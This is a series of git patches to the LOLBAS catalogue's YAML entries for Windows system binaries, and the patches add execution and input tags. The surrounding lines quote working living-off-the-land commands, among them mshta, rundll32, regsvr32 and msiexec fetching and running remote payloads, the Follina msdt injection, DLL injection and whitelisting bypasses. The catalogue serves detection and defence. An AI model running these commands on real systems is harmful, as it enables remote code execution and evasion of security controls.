C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe From f3739fade33986c891a14df1b616c747992973e8 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:33:39 +0200 Subject: [PATCH 029/148] Update Infdefaultinstall.yml Tags Added: Execute INF Input Custom Format --- yml/OSBinaries/Infdefaultinstall.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml index 4c866881..9d8c607c 100644 --- a/yml/OSBinaries/Infdefaultinstall.yml +++ b/yml/OSBinaries/Infdefaultinstall.yml @@ -11,6 +11,9 @@ Commands: Privileges: Admin MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: INF + - Input: Custom Format Full_Path: - Path: C:\Windows\System32\Infdefaultinstall.exe - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe From bb2ab8ccda07682f2f86e5f458c90db327201294 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:36:26 +0200 Subject: [PATCH 030/148] Update Mavinject.yml Tags Added Tags: Input Custom Format --- yml/OSBinaries/Mavinject.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/Mavinject.yml b/yml/OSBinaries/Mavinject.yml index 33e2aa7c..f89afc01 100644 --- a/yml/OSBinaries/Mavinject.yml +++ b/yml/OSBinaries/Mavinject.yml @@ -13,6 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL + - Input: Custom Format - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172 Usecase: Inject dll file into running process @@ -22,6 +23,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL + - Input: Custom Format Full_Path: - Path: C:\Windows\System32\mavinject.exe - Path: C:\Windows\SysWOW64\mavinject.exe From 699d8e980913e66efdcfff44f9863e351486ed66 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:39:18 +0200 Subject: [PATCH 031/148] Update Microsoft.Workflow.Compiler.yml Tags Added Tags: Execute VB.Net Execute C# Input Custom Format --- yml/OSBinaries/Microsoft.Workflow.Compiler.yml | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml index c26c0c2e..a711f8e6 100644 --- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml +++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml @@ -11,6 +11,10 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 10S, Windows 11 + Tags: + - Execute: VB.Net + - Execute: Csharp + - Input: Custom Format - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code @@ -18,6 +22,10 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 10S, Windows 11 + Tags: + - Execute: VB.Net + - Execute: Csharp + - Input: Custom Format - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code @@ -25,6 +33,10 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 10S, Windows 11 + Tags: + - Execute: VB.Net + - Execute: Csharp + - Input: Custom Format Full_Path: - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe Code_Sample: From 75cd5751021ad372a38f4f1808d0daa76119b10a Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 14:50:16 +0200 Subject: [PATCH 032/148] Category Bugfix --- yml/OSBinaries/Control.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml index 4ebd8813..a9b8c99d 100644 --- a/yml/OSBinaries/Control.yml +++ b/yml/OSBinaries/Control.yml @@ -17,7 +17,7 @@ Commands: - Command: control.exe c:\windows\tasks\evil.cpl Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function) Usecase: Use to execute code and bypass application whitelisting - Category: Execution + Category: Execute Privileges: User MitreID: T1218.002 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 From 504c922eb933151a1a3647bbdc2122cf2933c3a1 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 15:10:17 +0200 Subject: [PATCH 033/148] Update Hh.yml Tags Added execution remote tag --- yml/OSBinaries/Hh.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index 9d96358c..bc55c986 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -31,6 +31,7 @@ Commands: Tags: - Execute: CMD - Execute: CHM + - Execute: Remote - Input: Custom Format Full_Path: - Path: C:\Windows\hh.exe From 377c4b40847147957af1fb34910efc5d93ac627d Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 15:18:35 +0200 Subject: [PATCH 034/148] Update Mmc.yml Tags Added tags Execute DLL Input Custom format --- yml/OSBinaries/Mmc.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSBinaries/Mmc.yml b/yml/OSBinaries/Mmc.yml index 7dfdb8d8..0eb4ee99 100644 --- a/yml/OSBinaries/Mmc.yml +++ b/yml/OSBinaries/Mmc.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1218.014 OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 + Tags: + - Execute: DLL + - Input: Custom Format - Command: mmc.exe gpedit.msc Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC. Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL. From eef914dc7b5515d25cb102eca68bac0af2a8fb6f Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 15:23:20 +0200 Subject: [PATCH 035/148] Update Msbuild.yml Tags Added Tags: - Execute : CSharp - Execute CMD - Input Custom Format --- yml/OSBinaries/Msbuild.yml | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index 62d95ffe..80a2fa57 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: Csharp + - Input: Custom Format - Command: msbuild.exe project.csproj Description: Build and execute a C# project stored in the target csproj file. Usecase: Compile and run code @@ -18,6 +21,9 @@ Commands: Privileges: User MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: Csharp + - Input: Custom Format - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo Description: Executes generated Logger DLL file with TargetLogger export Usecase: Execute DLL @@ -27,6 +33,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL + - Input: Custom Format - Command: msbuild.exe project.proj Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+. Usecase: Execute project file that contains XslTransformation tag parameters @@ -36,6 +43,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: WSH + - Input: Custom Format - Command: msbuild.exe @sample.rsp Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line. Usecase: Bypass command-line based detections @@ -43,6 +51,9 @@ Commands: Privileges: User MitreID: T1036 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD + - Input: Custom Format Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe From a88747c29096c22e7271131ba5b38173b8264e12 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 15:25:01 +0200 Subject: [PATCH 036/148] Update Msconfig.yml Tags Added Tags: - Execute CMD Input Custom Format --- yml/OSBinaries/Msconfig.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSBinaries/Msconfig.yml b/yml/OSBinaries/Msconfig.yml index 56b2a4fa..54ba0b5e 100644 --- a/yml/OSBinaries/Msconfig.yml +++ b/yml/OSBinaries/Msconfig.yml @@ -11,6 +11,9 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: CMD + - Input: Custom Format Full_Path: - Path: C:\Windows\System32\msconfig.exe Code_Sample: From 9f3b237005da8adb01f4d676c0d90a9caf785b6e Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 15:49:14 +0200 Subject: [PATCH 037/148] Update Msdt.yml Tags Added Tags: Execute MSI Execute CMD Input Custom Format --- yml/OSBinaries/Msdt.yml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/yml/OSBinaries/Msdt.yml b/yml/OSBinaries/Msdt.yml index ed0a6019..1b9649eb 100644 --- a/yml/OSBinaries/Msdt.yml +++ b/yml/OSBinaries/Msdt.yml @@ -13,6 +13,8 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Application: GUI + - Execute: MSI + - Input: Custom Format - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. Usecase: Execute code bypass Application whitelisting @@ -22,6 +24,8 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Application: GUI + - Execute: MSI + - Input: Custom Format - Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe" Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update. Usecase: Execute code bypass Application allowlisting @@ -31,6 +35,8 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Application: GUI + - Execute: CMD + - Input: Custom Format Full_Path: - Path: C:\Windows\System32\Msdt.exe - Path: C:\Windows\SysWOW64\Msdt.exe From b8d98f067dbb2dd267c633bb44076d35066be715 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 15:54:08 +0200 Subject: [PATCH 038/148] Update Msedge.yml Tags Added Tags: Execute CMD Input Custom Format --- yml/OSBinaries/Msedge.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSBinaries/Msedge.yml b/yml/OSBinaries/Msedge.yml index 28443033..96d6f820 100644 --- a/yml/OSBinaries/Msedge.yml +++ b/yml/OSBinaries/Msedge.yml @@ -25,6 +25,9 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD + - Input: Custom Format Full_Path: - Path: c:\Program Files\Microsoft\Edge\Application\msedge.exe - Path: c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe From bd07c4dd2433f1f6790ecc90fde6cdea64e2bfcd Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 16:03:39 +0200 Subject: [PATCH 039/148] Update Mshta.yml Tags Added Tags: Execute: Remote Input Custom Format Execute JScript Execute VBScript --- yml/OSBinaries/Mshta.yml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index 8a3de9fe..a3d4fdea 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml @@ -13,6 +13,8 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: WSH + - Execute: Remote + - Input: Custom Format - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")")) Description: Executes VBScript supplied as a command line argument. Usecase: Execute code @@ -20,6 +22,8 @@ Commands: Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: VBScript - Command: mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close(); Description: Executes JavaScript supplied as a command line argument. Usecase: Execute code @@ -27,6 +31,8 @@ Commands: Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: JScript - Command: mshta.exe "C:\ads\file.txt:file.hta" Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. Usecase: Execute code hidden in alternate data stream From 090f8e207899bc6fea3a7c9c02d8c3a763393bdf Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 16:12:06 +0200 Subject: [PATCH 040/148] Update Msiexec.yml Tags Added Tags: Execute MSI Execute Remote Input Custom Format --- yml/OSBinaries/Msiexec.yml | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index 35a97e48..f58f0277 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1218.007 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: MSI + - Input: Custom Format - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png Description: Installs the target remote & renamed .MSI file silently. Usecase: Execute custom made msi file with attack code from remote server @@ -18,6 +21,10 @@ Commands: Privileges: User MitreID: T1218.007 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: MSI + - Execute: Remote + - Input: Custom Format - Command: msiexec /y "C:\folder\evil.dll" Description: Calls DllRegisterServer to register the target DLL. Usecase: Execute dll files @@ -27,6 +34,8 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL + - Execute: Remote + - Input: Custom Format - Command: msiexec /z "C:\folder\evil.dll" Description: Calls DllUnregisterServer to un-register the target DLL. Usecase: Execute dll files @@ -36,6 +45,8 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL + - Execute: Remote + - Input: Custom Format - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input. Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server @@ -43,6 +54,9 @@ Commands: Privileges: User MitreID: T1218.007 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: Remote + - Input: Custom Format Full_Path: - Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe From 7783b436cb7691c220ed8f3de4414f7a2898f270 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 16:24:52 +0200 Subject: [PATCH 041/148] Update Pcalua.yml Tags Tags added: Execute CMD Execute DLL --- yml/OSBinaries/Pcalua.yml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/yml/OSBinaries/Pcalua.yml b/yml/OSBinaries/Pcalua.yml index 8a8ee403..7162943a 100644 --- a/yml/OSBinaries/Pcalua.yml +++ b/yml/OSBinaries/Pcalua.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: pcalua.exe -a \\server\payload.dll Description: Open the target .DLL file with the Program Compatibilty Assistant. Usecase: Proxy execution of remote dll file @@ -20,6 +22,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: DLL + - Execute: Remote - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java Description: Open the target .CPL file with the Program Compatibility Assistant. Usecase: Execution of CPL files @@ -27,6 +30,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\System32\pcalua.exe Detection: From 5a1370ca110fca7a6ea7c87f14490dc16395e441 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 16:26:26 +0200 Subject: [PATCH 042/148] Update Pcwrun.yml Tags Added Tags: Execute EXE --- yml/OSBinaries/Pcwrun.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OSBinaries/Pcwrun.yml b/yml/OSBinaries/Pcwrun.yml index de15d070..cf36bb62 100644 --- a/yml/OSBinaries/Pcwrun.yml +++ b/yml/OSBinaries/Pcwrun.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: Pcwrun.exe /../../$(calc).exe Description: Leverage the MSDT follina vulnerability through Pcwrun to execute arbitrary commands and binaries. Note that this specific technique will not work on a patched system with the June 2022 Windows Security update. Usecase: Proxy execution of binary @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\pcwrun.exe Detection: From 741e0877df3a53e97d56410679255a842617fffc Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 16:29:07 +0200 Subject: [PATCH 043/148] Update Pnputil.yml Tags Added Tags: Execute INF --- yml/OSBinaries/Pnputil.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/Pnputil.yml b/yml/OSBinaries/Pnputil.yml index 1da2ab6b..5c45cce0 100644 --- a/yml/OSBinaries/Pnputil.yml +++ b/yml/OSBinaries/Pnputil.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1547 OperatingSystem: Windows 7, Windows 10, Windows 11 + Tags: + - Execute: INF Full_Path: - Path: C:\Windows\system32\pnputil.exe Code_Sample: From 8d6bd28331389f8cc9819b334a7947b622a28bdc Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 16:34:45 +0200 Subject: [PATCH 044/148] Update Presentationhost.yml Tags Added Tags: Execute XBAP --- yml/OSBinaries/Presentationhost.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/Presentationhost.yml b/yml/OSBinaries/Presentationhost.yml index 8a1b221d..a63a2a80 100644 --- a/yml/OSBinaries/Presentationhost.yml +++ b/yml/OSBinaries/Presentationhost.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: XBAP - Command: Presentationhost.exe https://example.com/payload Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server From d1f6a8a3972000152726fdd16b5c50d685444171 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 16:36:45 +0200 Subject: [PATCH 045/148] Update Provlaunch.yml Tags Added Tags: Execute CMD --- yml/OSBinaries/Provlaunch.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/Provlaunch.yml b/yml/OSBinaries/Provlaunch.yml index 0d29e27a..7f5b18b7 100644 --- a/yml/OSBinaries/Provlaunch.yml +++ b/yml/OSBinaries/Provlaunch.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 + Tags: + - Execute: CMD Full_Path: - Path: c:\windows\system32\provlaunch.exe Detection: From 9aa4200dae25c703feaae3b7dc2974ca3afdb5a8 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 16:41:32 +0200 Subject: [PATCH 046/148] Update Regasm.yml Tags Changed Tags DLL to .NetDLL --- yml/OSBinaries/Regasm.yml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml index 2272b263..00863c97 100644 --- a/yml/OSBinaries/Regasm.yml +++ b/yml/OSBinaries/Regasm.yml @@ -5,15 +5,14 @@ Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - Command: regasm.exe AllTheThingsx64.dll - Description: Loads the target .DLL file and executes the RegisterClass function. + Description: Loads the target .Net DLL file and executes the RegisterClass function. Usecase: Execute code and bypass Application whitelisting Category: AWL Bypass Privileges: Local Admin MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL - - Input: Custom Format + - Execute: .NetDLL - Command: regasm.exe /U AllTheThingsx64.dll Description: Loads the target .DLL file and executes the UnRegisterClass function. Usecase: Execute code and bypass Application whitelisting @@ -22,8 +21,7 @@ Commands: MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL - - Input: Custom Format + - Execute: .NetDLL Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe From ce907b4e5c52b8556ec0db85bee0ad3fdf9a57ac Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 16:45:00 +0200 Subject: [PATCH 047/148] Update Regsvcs.yml Tags Changed DLL to .NetDLL --- yml/OSBinaries/Regsvcs.yml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index 3a65a66f..1e6d7604 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml @@ -5,25 +5,23 @@ Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - Command: regsvcs.exe AllTheThingsx64.dll - Description: Loads the target .DLL file and executes the RegisterClass function. + Description: Loads the target .Net DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting Category: Execute Privileges: User MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL - - Input: Custom Format + - Execute: .NetDLL - Command: regsvcs.exe AllTheThingsx64.dll - Description: Loads the target .DLL file and executes the RegisterClass function. + Description: Loads the target .Net DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting Category: AWL Bypass Privileges: Local Admin MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL - - Input: Custom Format + - Execute: .NetDLL Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegSvcs.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe From b452a6c3e3705fcab4103cf2189043644ab93a82 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 16:48:37 +0200 Subject: [PATCH 048/148] Update Regsvr32.yml Tags Added Tags Execute: Remote Execute: SCT --- yml/OSBinaries/Regsvr32.yml | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/yml/OSBinaries/Regsvr32.yml b/yml/OSBinaries/Regsvr32.yml index 27067b81..43dc039d 100644 --- a/yml/OSBinaries/Regsvr32.yml +++ b/yml/OSBinaries/Regsvr32.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: SCT + - Execute: Remote - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting @@ -18,6 +21,8 @@ Commands: Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: SCT - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll Description: Execute the specified remote .SCT script with scrobj.dll. Usecase: Execute code from remote scriptlet, bypass Application whitelisting @@ -25,6 +30,9 @@ Commands: Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: SCT + - Execute: Remote - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting @@ -32,6 +40,8 @@ Commands: Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: SCT Full_Path: - Path: C:\Windows\System32\regsvr32.exe - Path: C:\Windows\SysWOW64\regsvr32.exe From 39adfc286a6829c1a83b4ccf7de7258e4ff2c155 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 16:53:16 +0200 Subject: [PATCH 049/148] Update Rundll32.yml Tags Added Tags: Execute: JScript Execute: EXE --- yml/OSBinaries/Rundll32.yml | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index ba5d622d..e1bb40c7 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -29,6 +29,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: JScript - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. Usecase: Proxy execution @@ -36,6 +38,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: JScript - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. Usecase: Proxy execution @@ -43,6 +47,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: JScript - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. Usecase: Execute code from Internet @@ -50,6 +56,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: JScript - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). Usecase: Execute code from alternate data stream @@ -68,6 +76,7 @@ Commands: OperatingSystem: Windows 10 (and likely previous versions), Windows 11 Tags: - Execute: DLL + - Execute: EXE Full_Path: 